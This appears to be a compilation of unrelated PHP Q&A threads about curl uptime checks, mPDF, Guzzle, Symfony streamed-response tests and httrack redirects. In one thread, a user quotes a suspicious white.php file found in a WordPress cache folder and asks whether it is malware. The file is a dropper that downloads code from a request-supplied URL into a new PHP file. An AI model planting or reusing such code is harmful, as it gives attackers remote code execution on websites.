Using my wordpress functions.php file to check if every image displayed is up and running or down. I think what I want to do is to break this functions code (below) into two.
function 1: check if mirror1.com is up (instead of checking every image in loop). insert if/then statement depending on http status of mirror1.com. (if mirror1.com is down, then use mirror2.com) -- pass that into $mirror_website
function 2: simply pass in $mirror_website.. (the front end has <img src="<?php echo $mirror_website; ?>/image.png"> )
The code below works, but it's checking EVERY simple image and slows down the site.
function amazons3acctreplaceto() {
$url = 'http://www.mirror1.com';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
$retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if (200==$retcode) {
$as3replaceto = "www.mirror1.com"; // All's well
} else {
$as3replaceto = "www.mirror2.com"; // not so much
}
A simple solution might be to cache the result (eg. in the APC or memcache) with a TTL so you don't need to work out if the site is up or down for every eventuality.
eg. Here's an example that might work using APC to cache the result of the site status for 2 minutes:
function amazons3acctreplaceto() {
$as3replaceto = FALSE;
if (function_exists('apc_fetch')) {
$as3replaceto = apc_fetch('as3replaceto');
}
if ($as3replaceto === FALSE) {
$url = 'http://www.mirror1.com';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
$retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if (200==$retcode) {
$as3replaceto = "www.mirror1.com"; // All's well
} else {
$as3replaceto = "www.mirror2.com"; // not so much
}
if (function_exists('apc_store')) {
apc_store('as3replaceto', $as3replaceto, 120); //Store status for 2 minutes
}
}
Related
I found white.php file on my /upload/cache Wordpress folder.
It contains this code:
<?php
$name = '68aa884d96d2e824669d2d.php';
$ch = curl_init ($_REQUEST['68aa884d96d2e824669d2d']);
$fp = fopen ($name, "w+");
curl_setopt ($ch, CURLOPT_FILE, $fp);
$ult = curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
if(!$ult){
$f = file_get_contents($_REQUEST['68aa884d96d2e824669d2d']);
file_put_contents($name,$f);
}
I'm a noob developer, I would like to know if this is a malware code and, if so, how could I investigate the issue.
Thank you.
mPDF stopping working for me, pdfs generated from php are now blank, when I turn on debug I get the following error message.
Error detected. PDF file generation aborted: file_get_contents(https://www.myurl.com/pdf.php): failed to open stream: operation failed
When I go directly to the php page it appears fine.
Here is the code I'm using, I changed permissions to 777 on the file and the folder and it still doesn't work yet if I change the url to an external one it works perfectly. So I'm guessing something on my server is blocking it.
require __DIR__ . '/vendor/autoload.php';
$invoice_id = $_GET['invoice_id'];
$url="https://www.myurl.com/pdf.php";
if (ini_get('allow_url_fopen')) {
$html = file_get_contents($url);
} else {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 );
$html = curl_exec($ch);
curl_close($ch);
}
try
{
$mpdf = new \Mpdf\Mpdf();
$mpdf->debug = true;
$mpdf->SetDisplayMode('fullwidth');
$mpdf->CSSselectMedia='mpdf'; // assuming you used this in the document header
$mpdf->setBasePath($url);
$mpdf->WriteHTML($html);
$mpdf->Output('invoice'.$invoice_id.'.pdf','D');
} catch (\Mpdf\MpdfException $e) { // Note: safer fully qualified exception
echo $e->getMessage();
}
To get the statuscode of a website with curl you can use the CURLOPT NOBODY.
Example:
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'http://www.example.com');
curl_setopt($curl , CURLOPT_NOBODY, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$status = curl_exec($curl);
curl_close($curl);
Is the following example with Guzzle as http library the same:
$guzzle = new Client();
$req = $guzzle->createRequest('GET', 'http://www.example.com');
$result = $guzzle->send($req);
$status = $result->getStatusCode();
My goal is to perform a curl/guzzle request without getting the body. Will that request with Guzzle only fetch the status code without wasting bandwith on other data?
In order to get status code of the response without downloading the whole content, you should use "head" method:
$client = new \GuzzleHttp\Client();
$response = $client->head('http://example.com/');
echo $response->getStatusCode();
I am writing functional tests with Symfony2.
I have a controller that calls a getImage() function which streams an image file as follows:
public function getImage($filePath)
$response = new StreamedResponse();
$response->headers->set('Content-Type', 'image/png');
$response->setCallback(function () use ($filePath) {
$bytes = #readfile(filePath);
if ($bytes === false || $bytes <= 0)
throw new NotFoundHttpException();
});
return $response;
}
In functional testing, I try to request the content with the Symfony test client as follows:
$client = static::createClient();
$client->request('GET', $url);
$content = $client->getResponse()->getContent();
The problem is that $content is empty, I guess because the response is generated as soon as the HTTP headers are received by the client, without waiting for a data stream to be delivered.
Is there a way to catch the content of the streamed response while still using $client->request() (or even some other function) to send the request to the server?
The return value of sendContent (rather than getContent) is the callback that you've set. getContent actually just returns false in Symfony2
Using sendContent you can enable the output buffer and assign the content to that for your tests, like so:
$client = static::createClient();
$client->request('GET', $url);
// Enable the output buffer
ob_start();
// Send the response to the output buffer
$client->getResponse()->sendContent();
// Get the contents of the output buffer
$content = ob_get_contents();
// Clean the output buffer and end it
ob_end_clean();
You can read more on the output buffer here
The API for StreamResponse is here
For me didn't work like that. Instead, I used ob_start() before making the request, and after the request i used $content = ob_get_clean() and made asserts on that content.
In test:
// Enable the output buffer
ob_start();
$this->client->request(
'GET',
'$url',
array(),
array(),
array('CONTENT_TYPE' => 'application/json')
);
// Get the output buffer and clean it
$content = ob_get_clean();
$this->assertEquals('my response content', $content);
Maybe this was because my response is a csv file.
In controller:
$response->headers->set('Content-Type', 'text/csv; charset=utf-8');
The current best answer used to work well for me for some time, but for some reason it isn't anymore. The response is parsed into a DOM crawler and the binary data is lost.
I could fix that by using the internal response. Here's the git patch of my changes[1]:
- ob_start();
$this->request('GET', $uri);
- $responseData = ob_get_clean();
+ $responseData = self::$client->getInternalResponse()->getContent();
I hope this can help someone.
[1]: you just need access to the client, which is a
Symfony\Bundle\FrameworkBundle\KernelBrowser
I try to mirror webpages recursively starting from URL supplied by user (there is a depth limit set of course). Wget didn't catch links from css/js so I decided to use httrack.
I try to mirror some site like this:
# httrack <http://onet.pl> -r6 --ext-depth=6 -O ./a "+*"
This website uses redirect (301) to http://www.onet.pl:80, httrack just
downloads index.html page with:
<a HREF="onet.pl/index.html" >Page has moved</a>
and nothing more! When I run:
# httrack <http://www.onet.pl> -r6 --ext-depth=6 -O ./a "+*"
it does what I want.
Is there any way to make httrack following redirects? Currently I just add "www."+url to httrack's URLs but it's not a real solution (doesn't cover all user cases). Are there any better website mirroring tools for linux?
On main httrack forum one of developers said that it's not possible.
Proper solution is to use another web mirroring tool.
You could use this script to determine first the real target url and then run httrack against that url :
function getCorrectUrl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if ($headers_end !== false) {
$out = substr($out, 0, $headers_end);
}
$headers = explode("\n", $out);
foreach ($headers as $header) {
if (substr($header, 0, 10) == "Location: ") {
$target = substr($header, 10);
return $target;
}
}
return $url;
}